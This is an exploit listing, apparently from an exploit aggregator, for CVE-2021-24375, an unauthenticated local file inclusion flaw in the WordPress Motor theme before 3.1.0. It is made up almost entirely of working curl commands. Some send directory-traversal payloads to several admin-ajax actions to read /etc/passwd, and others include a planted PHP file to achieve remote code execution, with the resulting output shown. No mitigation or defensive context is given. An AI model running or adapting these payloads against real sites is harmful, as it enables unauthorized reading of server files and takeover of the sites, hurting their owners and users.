Exploit for Motor theme < 3.1.0 - Unauthenticated Local File Inclusion CVE-2021-24375

Name: Exploit for Motor theme < 3.1.0 - Unauthenticated Local File Inclusion CVE-2021-24375
Rating: 5 (97 reviews)

2021-06-09 | CVSS 7.5

## https://sploitus.com/exploit?id=WPEX-ID:D9518429-79D3-4B13-88FF-3722D05EFA9F
# Remote file access:

# Motor theme v2.0.0:
% curl -i -F 'file=../../../../../../etc/passwd' -F 'action=motor_load_more' localhost:8888/wp-admin/admin-ajax.php
% curl -i -F 'file=../../../../../../etc/passwd' -F 'action=motor_gallery_load_more' localhost:8888/wp-admin/admin-ajax.php
% curl -i -F 'file=../../../../../../etc/passwd' -F 'action=motor_quick_view' 'localhost:8888/wp-admin/admin-ajax.php?product_id=42'

# Motor theme v3.0.0:
% curl -i -F 'file=/etc/passwd' -F 'action=motor_load_more' localhost:8888/wp-admin/admin-ajax.php

# Remote code execution

Given a file malicious.php with the following content, located anywhere in the file system: <?php echo 'PWNED!' ?>

PoC:
# Motor theme v2.0.0:
% curl -F 'file=../../../malicious.php' -F 'action=motor_load_more' 'localhost:8888/wp-admin/admin-ajax.php'
PWNED!

% curl -F 'file=../../../malicious.php' -F 'action=motor_gallery_load_more' 'localhost:8888/wp-admin/admin-ajax.php'
PWNED!

% curl -F 'file=../../../malicious.php' -F 'action=motor_quick_view' 'localhost:8888/wp-admin/admin-ajax.php?product_id=42'
PWNED!

# Motor theme v3.0.0:
% curl -F 'file=../../../malicious.php' -F 'action=motor_load_more' 'localhost:8888/wp-admin/admin-ajax.php'
PWNED!

% curl -F 'file=../../../malicious' -F 'action=motor_quick_view' 'localhost:8888/wp-admin/admin-ajax.php?product_id=42'
PWNED!

% curl -F 'file=../../../malicious' -F 'action=motor_project_quick_view' 'localhost:8888/wp-admin/admin-ajax.php?project_id=42'
PWNED!